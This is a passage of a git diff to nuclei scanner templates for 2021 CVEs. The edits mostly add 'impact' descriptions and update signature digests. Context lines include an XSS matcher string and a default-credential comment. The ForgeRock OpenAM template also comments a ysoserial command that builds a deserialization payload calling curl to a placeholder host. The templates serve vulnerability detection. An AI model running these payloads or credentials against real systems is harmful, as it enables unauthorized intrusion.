diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml
index 9957655741..863e8c8cb2 100644
--- a/http/cves/2021/CVE-2021-33564.yaml
+++ b/http/cves/2021/CVE-2021-33564.yaml
@@ -5,6 +5,8 @@ info:
   author: 0xsapra
   severity: critical
   description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202bc3a57511f9aab7bd825703b2971fa53f9bafe3e2bf622ed7f1c3c64ec8124102200190ca49eeff69fd4c1135c71faa928755bc7bad673076d79f83b4eb4762c7cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204551b76c369b67e87392e571193325a56e7b8154b7723b0669efdd4d94354cd1022100ab633837a77b2baeae9cb72366088a13bb5cc0f3f71dd3a6d08dbb851c8ebde1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml
index 341d151bf2..6a0582cd0a 100644
--- a/http/cves/2021/CVE-2021-3374.yaml
+++ b/http/cves/2021/CVE-2021-3374.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information.
   remediation: |
     Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200b02c1cd14e4520cbe56af1b431da46a8351b26f4b623753ddf33699d78def74022018cd68a7d8ddbd17469adbdc8403b5ead394c328637e1b44d8275ace93435bbc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fa8fd19136cd69450e2c5bf83de4bdde86af424c4f9420522a348d737d1df1b202207e7ab9df603a2235b81bac5551196fec4a6d389d02d486530550b581c227f36f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml
index 726c5a69c3..d5583f09f3 100644
--- a/http/cves/2021/CVE-2021-3377.yaml
+++ b/http/cves/2021/CVE-2021-3377.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or unauthorized actions.
   remediation: Upgrade to v5.0.0 or later.
   reference:
     - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
@@ -44,4 +46,4 @@ http:
       - type: word
         words:
           - "sh\"/onmouseover=\"alert(1)\">"
-# digest: 490a0046304402205bbbd16895ed3000416ebe4a141ab45ae1146e417279322acb1f5786fdca90f102202f30b8c8feb43fb724e41d43ae5b86d9115848bd267a8ec6bb62c3692f3f4eeb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a7f8f91cd095a93f26e63453505bf1f626bea765ee00841ae346224b21dd994c02201b9de406548a6b1c096ca39aa3239731accc0794b6adb15f9254803a5da15382:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml
index b8d6edce49..6b03b6db65 100644
--- a/http/cves/2021/CVE-2021-3378.yaml
+++ b/http/cves/2021/CVE-2021-3378.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210097a74c19136c9e72005b3f649c2db50792dcbb14482610016f2df1de7f1ac645022100f205e567c5e0ec657e5fdb8c511ffa21d9d209cd35ef4751506fedb7cd0c9bfb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008a870e07350cf001c03e65da744ef31203fa8a39233649a96209bab9065295d7022076b68916fb42deebf5931f2c66bc273ea4df9983f773e2167432cf5e48bc3d7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml
index b79b2fd58a..fde34ca53a 100644
--- a/http/cves/2021/CVE-2021-33807.yaml
+++ b/http/cves/2021/CVE-2021-33807.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system.
   remediation: |
     Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100abeb3adc6ced588c972275fe6d1e9d9c433dffcac912549cda0e98d5ad98ad56022027aab8e67326fb061c4fc65e8dc48fa61751d6af89e31c2b410051f0d9c21788:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ede2230198b65a5d4d4b7f609c420491c5c1e7f005a2a493f31c9ea8f2c5f0eb022100fb55ce6346d4585a5231aebce31de3feeb20d490458b222f520e418dfe21c65f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml
index 91274663f3..c7a03c12b0 100644
--- a/http/cves/2021/CVE-2021-33851.yaml
+++ b/http/cves/2021/CVE-2021-33851.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser.
   remediation: |
     Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
           - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
         internal: true
         part: body
-# digest: 4a0a0047304502200bdb77ffcf930e81ced3c213da9da56a2fb1eee65dbb9fc4bba917a347cb8a14022100c48082d4d46fee20ca491b48781bcea7dd35184210c6fb79c11c60eccec8a87c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022069222e18018658dfa8e2c3d060a660a675773041771014d917ff4ce87d38d520022021b618bb80cb0d35062bb06f9f22b6f4e8f3160a2794885c80dfcacf35a1cb84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml
index 4febf15883..2e779e9b34 100644
--- a/http/cves/2021/CVE-2021-33904.yaml
+++ b/http/cves/2021/CVE-2021-33904.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205c34c622f34d314a9bdd8f7feb900ef44f77119da1b55155e4dfe3f6588eabad022014e37c4a1023ba17e06fbf207220461aba8435159a0c657c3402f531eb5b87cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022030c9aab2624121c28dfe5c849fa02730f70054f0aaa1a4b6aa15e47f4329b988022100e8b33a5d406672064218fae4284d11ed9a5838c7d670965005bc7ceacc4a0255:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml
index 023fd05772..873a80f3d9 100644
--- a/http/cves/2021/CVE-2021-34370.yaml
+++ b/http/cves/2021/CVE-2021-34370.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via  ssoAdapter/logoutAction.do successURL.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a0047304502206767e9ede10b29f9c8b84a7a40d7deae1183765a42ba829b1eae8c8e9f350f73022100d9451002094297582ab411675f086cfe137ce2bf181aa32773c5b60a542d7e95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022051f17655253e398b138c33789f7309225634f81027f704249453698a80e7d18b02200de572baa80665607c62d435b15a443ade7bb26810c0da1c8fca852c48b7a72f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml
index 8b0d8dadcc..6cb9424fe3 100644
--- a/http/cves/2021/CVE-2021-34429.yaml
+++ b/http/cves/2021/CVE-2021-34429.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ef8200361430619c7e321aa3156e6d06de09cfd3907f13c54d54a3a32e88fee6022100d0f40a880320888681e9bfef9624a7d9b99d13750f719ec57266a19e6fd63d5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ffee14b33cd046f733ba00c7505386574f291f0c43cd31fa57c4392ff31ed94e02207c765f1b7dc394572c891c788f612fcd8e508e5ed1670784f8eaed4f6cdb1967:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml
index d7b96d6d31..7b02dc9c10 100644
--- a/http/cves/2021/CVE-2021-34473.yaml
+++ b/http/cves/2021/CVE-2021-34473.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Exchange Server, potentially leading to a complete compromise of the system.
   remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version.
   reference:
     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
@@ -40,4 +42,4 @@ http:
           - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
           - "Exchange MAPI/HTTP Connectivity Endpoint"
         condition: or
-# digest: 4a0a00473045022100bdd1a6f1c9e46f776d13203c8dcccee16036b6711a542bc4b6e1527d1dbad89002205a68f3e370fead40413d1de80dd42ff0cf07d2ae455a2ca86365cb58cb6a2f8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202689499e41b9fbec54373a691d4b09c04fb9932baf599fe5541c81747c58e05902207de965a235c31206f083f8a459ccd5476dc7b564572eda3d56476316daefba3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml
index 427a393591..564ff97e36 100644
--- a/http/cves/2021/CVE-2021-34621.yaml
+++ b/http/cves/2021/CVE-2021-34621.yaml
@@ -5,6 +5,8 @@ info:
   author: 0xsapra
   severity: critical
   description: ProfilePress WordPress plugin  is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
+  impact: |
+    An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site.
   remediation: |
     Update to the latest version of ProfilePress to fix the admin user creation weakness.
   reference:
@@ -115,4 +117,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100defc665326f154545e7b34e9879ec6e0d80212480a736df57bc7d203dd43088a0221009b2933a3a8f47ed50619cbf3559f4dc8a2f5fb20447ecaab18a6c4b9eed2f7ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022027830d779172b03a92f9ad941b9ad187e503bebe9ea8a4f0c642186db133dd2a022100b7d6740c969135945a83ebb2af93275bf8a0963e1d67f7deb4389e7d2f3798e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml
index 66f37c5e40..ea00604f64 100644
--- a/http/cves/2021/CVE-2021-34640.yaml
+++ b/http/cves/2021/CVE-2021-34640.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205bb8ec1b5383290df2cb3974b8a5a506e5e2a57d063c221637bebdb468b96fc302201ef9064e972c9463241165a6ee238b7d5c3cf1c4e2b64d46eb3fc40601115f25:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220749a734a07dc82b67a504baf4bf9a8cdb438cb639dda4fa7aa24c3b46fb9a0800220238875f5855f1256df63bc90755bf3ead80d661f59487b38c29d812cae12bd56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml
index 98b1d72d84..42c1b77065 100644
--- a/http/cves/2021/CVE-2021-34643.yaml
+++ b/http/cves/2021/CVE-2021-34643.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022003f1b6fce855092a4ab27531571211bbef4914f0a6db6cc9342ff6568f23a93b022100ddf175dfbd43bedcd1058d9d4686523f2f7518b22b9f8fe06fb0a45aef856cff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008b5c0125742ea4c6e8b34fc43704f07065a828a4636c459d8e968f10bf95501b02201da2686525ef74fc6b995260a64f49625a18579a5ec032270505cb0679896885:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml
index c226455d6c..638859e6a9 100644
--- a/http/cves/2021/CVE-2021-34805.yaml
+++ b/http/cves/2021/CVE-2021-34805.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
   remediation: |
     Apply the latest security patch or update to a non-vulnerable version of FAUST iServer.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022043f1455c48458ac4670da01969f55a498d4b8df4e9ba59c09a79b54572b6dc89022078c9e1f215fe9556c37f6b05334caced07e1f22ffe1c2a4eb5eae193ffe80f1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207b7b4db7d10980115cc940a4bf9f7c25ce1c6b3c6613626d3bcba1645e7e0e9c022100ab4ca3668a5b438dfafedb46d809a3bdd4852f39d0500aa0b223a3efd3ac70ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml
index 82238642aa..3cd335e1af 100644
--- a/http/cves/2021/CVE-2021-35250.yaml
+++ b/http/cves/2021/CVE-2021-35250.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks.
   remediation: Resolved in Serv-U 15.3 Hotfix 1.
   reference:
     - https://github.com/rissor41/SolarWinds-CVE-2021-35250
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 401
-# digest: 4a0a0047304502204f54258ed72d067c0d597025f595813b42b3ac22ec0f94374ad980afa0d3fb780221008782c09fc533e0d328f3d0638183eaaa31f67cae2efe102925a14d0f3e1c93bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bc1dc1dc36d5a588cbeec5a161eec2f53653498b17f7dbccad79352b2fca933a022059db6b465ad2101d6844139129e8917fc685126a5ec58f829c8a8d7324df74c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml
index 64d2a29c69..3a08d5cbc2 100644
--- a/http/cves/2021/CVE-2021-35265.yaml
+++ b/http/cves/2021/CVE-2021-35265.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page."
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265).
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201a1933d1bdf0b44cf126158628b00a9989dcb248e081f6e2d91b825156153c9802201c3b7adfe86ba932cac10b7ff30d88b1248296066bbde7becfc44340f9b7924d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210091b9d0dc5f25b4b95b25dd218d13d8678a010f3a33c16c3be5c309fbdcb4ee610220342ff0d8bd8fb826e282d72a73c273d9e6ad825eacc41d13236fa1d415bcfbb5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml
index 538ceb1009..e627033b92 100644
--- a/http/cves/2021/CVE-2021-35336.yaml
+++ b/http/cves/2021/CVE-2021-35336.yaml
@@ -5,6 +5,8 @@ info:
   author: Pratik Khalane
   severity: critical
   description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.
+  impact: |
+    An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway.
   remediation: |
     Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 200
 
 # admin:password
-# digest: 4a0a00473045022100eaab77e0c1281db1de67763f9feab8bda1a831cf8420158af872e09be62615490220525c3e2e355dd7a677df62c2b7f47742d195a71fc9b1ddcbfa17d89b26820e0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022032e711325d1a246d95e4703fdb5b9cca90a3b4cd1826b0b85d2435da2adeecc20220527c06b104e79117b5faa68589279c635611369578ee0554a10b15a01225c8a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml
index 6a9c97bca9..cbd46896a2 100644
--- a/http/cves/2021/CVE-2021-35380.yaml
+++ b/http/cves/2021/CVE-2021-35380.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
   remediation: |
     Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.
   reference:
@@ -40,4 +42,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 4a0a004730450221008e185f1833fc7ff0ea48613588677a7eb0f1b241cedf877c813c44e49b9e1b9c02202d7c89d722bb93c84fc7e967f1ecf7eb44ddeaa8c0f96e8d6402e4bae22a0893:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207cb73d9a3d5cb8ca022f60f7282cf4d1925c1bfe37630cc2c0550f5a37b2f30202205bc9f7650e7395e56dec3d1b2d2f18b1f32a600caa0794448efd6425b586f5c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml
index 22185e4985..189acf310a 100644
--- a/http/cves/2021/CVE-2021-35464.yaml
+++ b/http/cves/2021/CVE-2021-35464.yaml
@@ -9,6 +9,8 @@ info:
     The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted
     /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)
     found in versions of Java 8 or earlier.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade ForgeRock OpenAM to version 7.0 or later to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
 
 # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>
 # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
-# digest: 490a0046304402206d59703f8d9581f278d3bacf2d9123693b3567fed9d1212be7a5f82a2a7a01cb02200679837f59d8b6325e46a418baed9406f448a27c18cb42f19c369216852ec2b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207249c5397bb05b8e65316393fe9524111143dfb27e35e3d8b0b662e1aba1010402206630e97a2c0d8553a0f1359ddac6ef37f339c557464aeaec8c01a09b121d5450:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml
index dd7485ebb3..66a7dd9af7 100644
--- a/http/cves/2021/CVE-2021-35488.yaml
+++ b/http/cves/2021/CVE-2021-35488.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 401
-# digest: 4a0a0047304502205d884ad4370fc4be37c3ee9ab6f380af5fdc83c09e45c513480bb1d7a9db6763022100b9791624fa6b72b09502bcc80b41e456e871fff949e99adb3ad61a8c2f2f6064:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203f5e6fcc18171dbd4aba97d44364445500e41ea1607c1e91cf01f113e716d48f022100a1c31f4fb8b20019e6323892c8948e5f073be5a8cc19837bbebb8ab454ccd3ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml
index ce6ba7bc60..c192ed8efb 100644
--- a/http/cves/2021/CVE-2021-35587.yaml
+++ b/http/cves/2021/CVE-2021-35587.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Oracle Access Manager  portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by Oracle to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d4e14640160883a2dcb1c25dd60a2aae3301cea1987472785993b7f45e0d20cc022100e40a5dceb5e15c108ea3ab66da6e64b50f8d0439b73d4e54b7fe2ba141be70fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a4e1676b810a7b1110e66e0ee965c4e9819ee8ddbf8896ed555fee4617d54676022037cce8f797e766a330426674496d424de13a346af38f425acdc694909fc70bef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml
index cc4ba95188..d979655e90 100644
--- a/http/cves/2021/CVE-2021-3577.yaml
+++ b/http/cves/2021/CVE-2021-3577.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
   remediation: |
     Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022046748a8e2806f230b481f5878494b190aa076add18554009d181810242fb2cac02204b8363180cf47e6f149ad66eb8ebd26f3f6766d3a2827ce0d750cf2d4e3126b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220501c2f88c4b91ee0c3f0f0dd7377d8a961ae00d9707267829a0e5751694744d4022100d4b6b6181092729a27adc532ac9601f753c6b7b4ddf575a3eca2a49ebb0d0d4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml
index 7476991476..b77ab1e4b0 100644
--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam,gy741,johnk3r
   severity: critical
   description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device.
   remediation: |
